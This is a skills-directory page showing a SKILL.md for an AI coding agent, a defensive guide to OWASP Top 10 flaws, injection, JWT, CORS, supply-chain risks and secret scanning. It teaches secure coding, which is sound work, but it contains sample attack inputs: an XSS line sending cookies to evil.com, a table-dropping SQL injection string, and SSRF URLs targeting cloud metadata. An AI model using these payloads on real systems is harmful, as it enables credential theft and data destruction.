Back to skills
SKILL.md
Vulnerability Scanner
ASecurityUse when Security vulnerability analysis mastery. OWASP Top 10 (2025), injection attacks (SQL, XSS, SSRF, command), authentication/authorization flaws, dependency vulnerabilities, secret scanning, CORS misconfiguration, supply chain attacks, and security headers. Use when auditing security, reviewing code for vulnerabilities, or hardening applications.
- 5 stars
- 0 votes
- 0 copies
- 1 view
- Added September 27, 2026
Works with
Security analysis
96/100- Installs packages at runtime which could introduce malicious dependencies
Pro scans all 2 files and shows the line behind each finding
npx -y skills add Harmitx7/tribunal-kit --skill vulnerability-scanner --agent claude-codeAre you the author of Vulnerability Scanner?
Add the live security badge to your README. It updates with every re-scan.
[](https://www.skillsdirectory.com/skills/harmitx7-vulnerability-scanner-tribunal-kit)---
name: vulnerability-scanner
description: "Use when Security vulnerability analysis mastery. OWASP Top 10 (2025), injection attacks (SQL, XSS, SSRF, command), authentication/authorization flaws, dependency vulnerabilities, secret scanning, CORS misconfiguration, supply chain attacks, and security headers. Use when auditing security, reviewing code for vulnerabilities, or hardening applications."
version: 5.0.0
last-updated: 2026-09-13
skills:
- backend-security-expert
- frontend-security-expert
- api-security-auditor
tools: Read, Grep, Glob, Bash, Edit, Write
scripts-binding:
- .agent/scripts/lint_runner.js
- .agent/scripts/verify_all.js
---
# Vulnerability Scanner β Security Analysis Mastery
---
## π οΈ Technical Architecture & Reference Recipes
---
---
## OWASP Top 10 (2025)
```
A01 Broken Access Control β Missing authorization checks
A02 Cryptographic Failures β Weak encryption, exposed secrets
A03 Injection β SQL, XSS, command, LDAP
A04 Insecure Design β Missing threat modeling
A05 Security Misconfiguration β Default credentials, verbose errors
A06 Vulnerable Components β Outdated dependencies
A07 Authentication Failures β Weak passwords, missing MFA
A08 Data Integrity Failures β Untrusted deserialization, missing SRI
A09 Logging & Monitoring Failures β No audit trail, alert blindness
A10 SSRF β Server-side request forgery
```
---
## Injection Attacks
### SQL Injection
```typescript
// β VULNERABLE: String interpolation in SQL
const query = `SELECT * FROM users WHERE email = '${email}'`;
// Attack: email = "'; DROP TABLE users; --"
// β
SAFE: Parameterized queries
const result = await db.query('SELECT * FROM users WHERE email = $1', [email]);
// β
SAFE: ORM (Prisma, Drizzle)
const user = await prisma.user.findUnique({ where: { email } });
// β HALLUCINATION TRAP: Template literals are NOT parameterized
// β db.query(`SELECT * FROM users WHERE id = ${id}`); β VULNERABLE
// β
db.query("SELECT * FROM users WHERE id = $1", [id]); β SAFE
```
### XSS (Cross-Site Scripting)
```typescript
// β VULNERABLE: innerHTML with user input
element.innerHTML = userComment;
// Attack: userComment = "<script>document.location='https://evil.com?c='+document.cookie</script>"
// β
SAFE: textContent (no HTML parsing)
element.textContent = userComment;
// React auto-escapes by default β BUT:
// β VULNERABLE in React:
<div dangerouslySetInnerHTML={{ __html: userInput }} /> // bypasses escaping
// β
SAFE in React:
<div>{userInput}</div> // auto-escaped
// Content Security Policy (defense in depth)
// Add HTTP header:
// Content-Security-Policy: default-src 'self'; script-src 'self'; style-src 'self'
```
### SSRF (Server-Side Request Forgery)
```typescript
// β VULNERABLE: fetching user-provided URLs
app.get('/proxy', async (req, res) => {
const data = await fetch(req.query.url).then(r => r.text());
res.send(data);
});
// Attack: url = "http://169.254.169.254/latest/meta-data/" (AWS metadata)
// Attack: url = "http://localhost:6379/" (internal Redis)
// β
SAFE: Allowlist of domains
const ALLOWED_HOSTS = new Set(['api.example.com', 'cdn.example.com']);
app.get('/proxy', async (req, res) => {
const url = new URL(req.query.url as string);
if (!ALLOWED_HOSTS.has(url.hostname)) {
return res.status(403).json({ error: 'Domain not allowed' });
}
// Additional: block private IP ranges
const ip = await dns.resolve4(url.hostname);
if (isPrivateIP(ip[0])) {
return res.status(403).json({ error: 'Private IP not allowed' });
}
const data = await fetch(url).then(r => r.text());
res.send(data);
});
```
---
## Authentication & Authorization
```typescript
// JWT Best Practices
import jwt from 'jsonwebtoken';
// β
SAFE: Specify algorithm explicitly
const token = jwt.sign(payload, SECRET, {
algorithm: 'HS256', // explicit
expiresIn: '15m', // short-lived access token
issuer: 'myapp',
});
// β
SAFE: Verify with explicit algorithms
const decoded = jwt.verify(token, SECRET, {
algorithms: ['HS256'], // MUST specify β prevents algorithm confusion attack
issuer: 'myapp',
});
// β HALLUCINATION TRAP: jwt.verify() without algorithms option is VULNERABLE
// β jwt.verify(token, SECRET); β accepts ANY algorithm including "none"
// β
jwt.verify(token, SECRET, { algorithms: ["HS256"] });
// Authorization: check BEFORE business logic
app.delete('/api/posts/:id', async (req, res) => {
const post = await getPost(req.params.id);
if (!post) return res.status(404).json({ error: 'Not found' });
// β
Authorization check BEFORE delete
if (post.authorId !== req.user.id && req.user.role !== 'admin') {
return res.status(403).json({ error: 'Forbidden' });
}
await deletePost(post.id);
res.status(204).send();
});
```
---
## Dependency Security
```bash
# Check for known vulnerabilities
npm audit # built-in
npx snyk test # Snyk (more comprehensive)
npx socket check # Socket.dev (supply chain)
# Auto-fix
npm audit fix
# lock file integrity
# β
Commit package-lock.json / pnpm-lock.yaml
# β
Use npm ci in CI (not npm install)
# β
Pin exact versions for critical dependencies
# β
Enable Dependabot or Renovate for auto-updates
```
```
Supply chain attack vectors:
1. Typosquatting β "recat" instead of "react"
2. Maintainer hijack β compromised npm account
3. Dependency confusion β private package name exists on public registry
4. Malicious postinstall β runs arbitrary code on npm install
5. Abandoned packages β unmaintained, no security patches
Defense:
- Review new dependencies before adding
- Use npm audit in CI (fail on high severity)
- Pin versions, review lockfile diffs
- Use --ignore-scripts for untrusted packages
```
---
## Security Headers
```typescript
import helmet from 'helmet';
app.use(helmet()); // Sets secure defaults
// Key headers set by helmet:
// Content-Security-Policy β Controls resource loading
// X-Content-Type-Options β Prevents MIME sniffing (nosniff)
// X-Frame-Options β Prevents clickjacking (DENY)
// Strict-Transport-Security β Forces HTTPS (HSTS)
// X-XSS-Protection β Legacy XSS filter (deprecated, CSP is better)
// Referrer-Policy β Controls referrer header
// CORS β never wildcard in production
app.use(
cors({
origin: ['https://myapp.com', 'https://admin.myapp.com'],
methods: ['GET', 'POST', 'PUT', 'DELETE'],
credentials: true,
}),
);
// β HALLUCINATION TRAP: origin: "*" disables CORS protection entirely
// β cors({ origin: "*" }) β allows any website to call your API
// β
cors({ origin: ["https://myapp.com"] }) β whitelist specific domains
```
---
## Secret Scanning
```
Secrets that MUST be in environment variables:
- Database connection strings
- API keys (Stripe, SendGrid, etc.)
- JWT signing secrets
- OAuth client secrets
- Encryption keys
Detection tools:
- git-secrets (pre-commit hook)
- TruffleHog / detect-secrets (scan history)
- GitHub secret scanning (automatic)
- GitGuardian (enterprise)
If a secret is committed:
1. IMMEDIATELY rotate the secret (new key/password)
2. Remove from git history (BFG Repo-Cleaner or git-filter-repo)
3. Force-push cleaned history
4. Audit access logs for the compromised secret
5. Post-incident review
```
---
---
## Security Checklists
---
### OWASP Top 10 Audit Checklist
#### A01: Broken Access Control
- [ ] Authorization on all protected routes
- [ ] Deny by default
- [ ] Rate limiting implemented
- [ ] CORS properly configured
#### A02: Cryptographic Failures
- [ ] Passwords hashed (bcrypt/argon2, cost 12+)
- [ ] Sensitive data encrypted at rest
- [ ] TLS 1.2+ for all connections
- [ ] No secrets in code/logs
#### A03: Injection
- [ ] Parameterized queries
- [ ] Input validation on all user data
- [ ] Output encoding for XSS
- [ ] No eval() or dynamic code execution
#### A04: Insecure Design
- [ ] Threat modeling done
- [ ] Security requirements defined
- [ ] Business logic validated
#### A05: Security Misconfiguration
- [ ] Unnecessary features disabled
- [ ] Error messages sanitized
- [ ] Security headers configured
- [ ] Default credentials changed
#### A06: Vulnerable Components
- [ ] Dependencies up to date
- [ ] No known vulnerabilities
- [ ] Unused dependencies removed
#### A07: Authentication Failures
- [ ] MFA available
- [ ] Session invalidation on logout
- [ ] Session timeout implemented
- [ ] Brute force protection
#### A08: Integrity Failures
- [ ] Dependency integrity verified
- [ ] CI/CD pipeline secured
- [ ] Update mechanism secured
#### A09: Logging Failures
- [ ] Security events logged
- [ ] Logs protected
- [ ] No sensitive data in logs
- [ ] Alerting configured
#### A10: SSRF
- [ ] URL validation implemented
- [ ] Allow-list for external calls
- [ ] Network segmentation
---
### Authentication Checklist
- [ ] Strong password policy
- [ ] Account lockout
- [ ] Secure password reset
- [ ] Session management
- [ ] Token expiration
- [ ] Logout invalidation
---
### API Security Checklist
- [ ] Authentication required
- [ ] Authorization per endpoint
- [ ] Input validation
- [ ] Rate limiting
- [ ] Output sanitization
- [ ] Error handling
---
### Data Protection Checklist
- [ ] Encryption at rest
- [ ] Encryption in transit
- [ ] Key management
- [ ] Data minimization
- [ ] Secure deletion
---
### Security Headers
| Header | Purpose |
| ----------------------------- | ---------------- |
| **Content-Security-Policy** | XSS prevention |
| **X-Content-Type-Options** | MIME sniffing |
| **X-Frame-Options** | Clickjacking |
| **Strict-Transport-Security** | Force HTTPS |
| **Referrer-Policy** | Referrer control |
---
### Quick Audit Commands
| Check | What to Look For |
| ------------------ | --------------------------- |
| Secrets in code | password, api_key, secret |
| Dangerous patterns | eval, innerHTML, SQL concat |
| Dependency issues | npm audit, snyk |
---
**Usage:** Copy relevant checklists into your PLAN.md or security report.
Files in this skill
- SKILL.md
- scripts/security_scan.py
Attribution
Comments
Loading commentsβ¦